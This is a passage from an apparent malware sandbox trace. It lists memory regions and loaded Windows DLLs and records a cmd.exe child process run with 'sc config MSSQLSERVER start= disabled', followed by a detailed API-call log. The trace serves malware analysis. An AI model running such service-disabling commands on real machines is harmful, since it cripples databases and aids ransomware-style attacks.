(normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5726 start_va = 0x4610000 end_va = 0x461ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004610000" filename = "" Region: id = 5727 start_va = 0x4620000 end_va = 0x4623fff entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 5728 start_va = 0x4630000 end_va = 0x4634fff entry_point = 0x4630000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 5729 start_va = 0x4710000 end_va = 0x474ffff entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 5730 start_va = 0x4750000 end_va = 0x478ffff entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 5731 start_va = 0x47a0000 end_va = 0x47a0fff entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 5732 start_va = 0x47b0000 end_va = 0x47b0fff entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 5733 start_va = 0x47c0000 end_va = 0x47c3fff entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 5734 start_va = 0x48d0000 end_va = 0x498dfff entry_point = 0x48d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5735 start_va = 0x4a20000 end_va = 0x4a2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a20000" filename = "" Region: id = 5736 start_va = 0x4a30000 end_va = 0x4bb7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a30000" filename = "" Region: id = 5737 start_va = 0x4bc0000 end_va = 0x4d40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004bc0000" filename = "" Region: id = 5738 start_va = 0x4d50000 end_va = 0x614ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d50000" filename = "" Region: id = 5739 start_va = 0x6150000 end_va = 0x6486fff entry_point = 0x6150000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5740 start_va = 0x748e0000 end_va = 0x74a1efff entry_point = 0x748e0000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 5741 start_va = 0x74a20000 end_va = 0x74a5efff entry_point = 0x74a20000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5742 start_va = 0x74a60000 end_va = 0x74a67fff entry_point = 0x74a60000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 5743 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5744 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5745 start_va = 0x74b20000 end_va = 0x74b36fff entry_point = 0x74b20000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5746 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5747 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5748 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5749 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5750 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5751 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5752 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5753 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5754 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5755 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5756 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5757 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5758 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5759 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5760 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5761 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5762 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5763 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5764 start_va = 0x7ed20000 end_va = 0x7ee1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed20000" filename = "" Region: id = 5765 start_va = 0x7ee49000 end_va = 0x7ee4bfff entry_point = 0x0 region_type = private name = "private_0x000000007ee49000" filename = "" Thread: id = 368 os_tid = 0xdac Thread: id = 369 os_tid = 0xd88 Process: id = "92" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x58910000" os_pid = "0xdd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSSQLSERVER start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5766 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5767 start_va = 0xc00000 end_va = 0x4bfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 5768 start_va = 0x4c00000 end_va = 0x4c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 5769 start_va = 0x4c20000 end_va = 0x4c20fff entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 5770 start_va = 0x4c30000 end_va = 0x4c43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c30000" filename = "" Region: id = 5771 start_va = 0x4c50000 end_va = 0x4c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c50000" filename = "" Region: id = 5772 start_va = 0x4c90000 end_va = 0x4d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c90000" filename = "" Region: id = 5773 start_va = 0x4d90000 end_va = 0x4d93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d90000" filename = "" Region: id = 5774 start_va = 0x4da0000 end_va = 0x4da0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004da0000" filename = "" Region: id = 5775 start_va = 0x4db0000 end_va = 0x4db1fff entry_point = 0x0 region_type = private name = "private_0x0000000004db0000" filename = "" Region: id = 5776 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5777 start_va = 0x7edd0000 end_va = 0x7edf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007edd0000" filename = "" Region: id = 5778 start_va = 0x7edf3000 end_va = 0x7edf3fff entry_point = 0x0 region_type = private name = "private_0x000000007edf3000" filename = "" Region: id = 5779 start_va = 0x7edfc000 end_va = 0x7edfefff entry_point = 0x0 region_type = private name = "private_0x000000007edfc000" filename = "" Region: id = 5780 start_va = 0x7edff000 end_va = 0x7edfffff entry_point = 0x0 region_type = private name = "private_0x000000007edff000" filename = "" Region: id = 5781 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5782 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5783 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 5784 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5785 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 5786 start_va = 0x4e40000 end_va = 0x4e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e40000" filename = "" Region: id = 5787 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5788 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5789 start_va = 0x4ef0000 end_va = 0x4feffff entry_point = 0x0 region_type = private name = "private_0x0000000004ef0000" filename = "" Region: id = 5790 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5831 start_va = 0x4c00000 end_va = 0x4c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c00000" filename = "" Region: id = 5832 start_va = 0x4dc0000 end_va = 0x4dfffff entry_point = 0x0 region_type = private name = "private_0x0000000004dc0000" filename = "" Region: id = 5833 start_va = 0x4ff0000 end_va = 0x50adfff entry_point = 0x4ff0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5834 start_va = 0x50b0000 end_va = 0x51affff entry_point = 0x0 region_type = private name = "private_0x00000000050b0000" filename = "" Region: id = 5835 start_va = 0x5260000 end_va = 0x526ffff entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 5836 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5837 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5838 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5839 start_va = 0x7ecd0000 end_va = 0x7edcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ecd0000" filename = "" Region: id = 5840 start_va = 0x7edf9000 end_va = 0x7edfbfff entry_point = 0x0 region_type = private name = "private_0x000000007edf9000" filename = "" Region: id = 5841 start_va = 0x4c10000 end_va = 0x4c13fff entry_point = 0x0 region_type = private name = "private_0x0000000004c10000" filename = "" Region: id = 5842 start_va = 0x4c20000 end_va = 0x4c23fff entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 5843 start_va = 0x5270000 end_va = 0x55a6fff entry_point = 0x5270000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 370 os_tid = 0xdd0 [0127.398] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0127.398] __set_app_type (_Type=0x1) [0127.398] __p__fmode () returned 0x77ac4d6c [0127.398] __p__commode () returned 0x77ac5b1c [0127.398] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0127.398] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0127.399] GetCurrentThreadId () returned 0xdd0 [0127.399] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdd0) returned 0x84 [0127.399] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0127.399] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0127.399] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.401] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.401] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4d8fc0c | out: phkResult=0x4d8fc0c*=0x0) returned 0x2 [0127.401] VirtualQuery (in: lpAddress=0x4d8fc13, lpBuffer=0x4d8fbc4, dwLength=0x1c | out: lpBuffer=0x4d8fbc4*(BaseAddress=0x4d8f000, AllocationBase=0x4c90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.401] VirtualQuery (in: lpAddress=0x4c90000, lpBuffer=0x4d8fbc4, dwLength=0x1c | out: lpBuffer=0x4d8fbc4*(BaseAddress=0x4c90000, AllocationBase=0x4c90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0127.401] VirtualQuery (in: lpAddress=0x4c91000, lpBuffer=0x4d8fbc4, dwLength=0x1c | out: lpBuffer=0x4d8fbc4*(BaseAddress=0x4c91000, AllocationBase=0x4c90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0127.401] VirtualQuery (in: lpAddress=0x4c93000, lpBuffer=0x4d8fbc4, dwLength=0x1c | out: lpBuffer=0x4d8fbc4*(BaseAddress=0x4c93000, AllocationBase=0x4c90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.401] VirtualQuery (in: lpAddress=0x4d90000, lpBuffer=0x4d8fbc4, dwLength=0x1c | out: lpBuffer=0x4d8fbc4*(BaseAddress=0x4d90000, AllocationBase=0x4d90000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0127.401] GetConsoleOutputCP () returned 0x1b5 [0127.401] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0127.402] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0127.402] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.402] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0127.402] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.402] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0127.402] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.402] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0127.402] _get_osfhandle (_FileHandle=0) returned 0x38 [0127.402] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0127.402] _get_osfhandle (_FileHandle=0) returned 0x38 [0127.402] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0127.403] GetEnvironmentStringsW () returned 0x4ef7d90* [0127.403] FreeEnvironmentStringsA (penv="A") returned 1 [0127.403] GetEnvironmentStringsW () returned 0x4ef7d90* [0127.403] FreeEnvironmentStringsA (penv="A") returned 1 [0127.403] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4d8eb70 | out: phkResult=0x4d8eb70*=0x94) returned 0x0 [0127.403] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4d8eb74, lpData=0x4d8eb7c, lpcbData=0x4d8eb78*=0x1000 | out: lpType=0x4d8eb74*=0x0, lpData=0x4d8eb7c*=0xb8, lpcbData=0x4d8eb78*=0x1000) returned 0x2 [0127.403] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4d8eb74, lpData=0x4d8eb7c, lpcbData=0x4d8eb78*=0x1000 | out: lpType=0x4d8eb74*=0x4, lpData=0x4d8eb7c*=0x1, lpcbData=0x4d8eb78*=0x4) returned 0x0 [0127.403] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4d8eb74, lpData=0x4d8eb7c, lpcbData=0x4d8eb78*=0x1000 | out: lpType=0x4d8eb74*=0x0, lpData=0x4d8eb7c*=0x1, lpcbData=0x4d8eb78*=0x1000) returned 0x2 [0127.403] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4d8eb74, lpData=0x4d8eb7c, lpcbData=0x4d8eb78*=0x1000 | out: lpType=0x4d8eb74*=0x4, lpData=0x4d8eb7c*=0x0, lpcbData=0x4d8eb78*=0x4) returned 0x0 [0127.403] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4d8eb74, lpData=0x4d8eb7c, lpcbData=0x4d8eb78*=0x1000 | out: lpType=0x4d8eb74*=0x4, lpData=0x4d8eb7c*=0x40, lpcbData=0x4d8eb78*=0x4) returned 0x0 [0127.403] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4d8eb74, lpData=0x4d8eb7c, lpcbData=0x4d8eb78*=0x1000 | out: lpType=0x4d8eb74*=0x4, lpData=0x4d8eb7c*=0x40, lpcbData=0x4d8eb78*=0x4) returned 0x0 [0127.403] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4d8eb74, lpData=0x4d8eb7c, lpcbData=0x4d8eb78*=0x1000 | out: lpType=0x4d8eb74*=0x0, lpData=0x4d8eb7c*=0x40, lpcbData=0x4d8eb78*=0x1000) returned 0x2 [0127.403] RegCloseKey (hKey=0x94) returned 0x0 [0127.403] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4d8eb70 | out: phkResult=0x4d8eb70*=0x94) returned 0x0 [0127.403] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4d8eb74, lpData=0x4d8eb7c, lpcbData=0x4d8eb78*=0x1000 | out: lpType=0x4d8eb74*=0x0, lpData=0x4d8eb7c*=0x40, lpcbData=0x4d8eb78*=0x1000) returned 0x2 [0127.403] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4d8eb74, lpData=0x4d8eb7c, lpcbData=0x4d8eb78*=0x1000 | out: lpType=0x4d8eb74*=0x4, lpData=0x4d8eb7c*=0x1, lpcbData=0x4d8eb78*=0x4) returned 0x0 [0127.403] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4d8eb74, lpData=0x4d8eb7c, lpcbData=0x4d8eb78*=0x1000 | out: lpType=0x4d8eb74*=0x0, lpData=0x4d8eb7c*=0x1, lpcbData=0x4d8eb78*=0x1000) returned 0x2 [0127.403] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4d8eb74, lpData=0x4d8eb7c, lpcbData=0x4d8eb78*=0x1000 | out: lpType=0x4d8eb74*=0x4, lpData=0x4d8eb7c*=0x0, lpcbData=0x4d8eb78*=0x4) returned 0x0 [0127.403] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4d8eb74, lpData=0x4d8eb7c, lpcbData=0x4d8eb78*=0x1000 | out: lpType=0x4d8eb74*=0x4, lpData=0x4d8eb7c*=0x9, lpcbData=0x4d8eb78*=0x4) returned 0x0 [0127.403] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4d8eb74, lpData=0x4d8eb7c, lpcbData=0x4d8eb78*=0x1000 | out: lpType=0x4d8eb74*=0x4, lpData=0x4d8eb7c*=0x9, lpcbData=0x4d8eb78*=0x4) returned 0x0 [0127.403] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4d8eb74, lpData=0x4d8eb7c, lpcbData=0x4d8eb78*=0x1000 | out: lpType=0x4d8eb74*=0x0, lpData=0x4d8eb7c*=0x9, lpcbData=0x4d8eb78*=0x1000) returned 0x2 [0127.403] RegCloseKey (hKey=0x94) returned 0x0 [0127.404] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29830 [0127.404] srand (_Seed=0x5ad29830) [0127.404] GetCommandLineW () returned="/c sc config MSSQLSERVER start= disabled" [0127.404] GetCommandLineW () returned="/c sc config MSSQLSERVER start= disabled" [0127.404] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0127.404] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4ef9ce8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0127.404] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0127.404] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.404] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.404] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0127.404] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0127.404] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0127.404] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0127.404] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0127.404] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0127.404] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0127.404] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0127.404] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0127.404] GetEnvironmentStringsW () returned 0x4ef7d90* [0127.404] FreeEnvironmentStringsA (penv="A") returned 1 [0127.404] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.404] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.404] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0127.404] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0127.404] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0127.404] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0127.404] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0127.404] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0127.404] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0127.404] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0127.405] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4d8f948 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0127.405] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4d8f948, lpFilePart=0x4d8f940 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4d8f940*="Desktop") returned 0x1d [0127.405] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0127.405] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4d8f6c8 | out: lpFindFileData=0x4d8f6c8) returned 0x4ef05c8 [0127.405] FindClose (in: hFindFile=0x4ef05c8 | out: hFindFile=0x4ef05c8) returned 1 [0127.405] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4d8f6c8 | out: 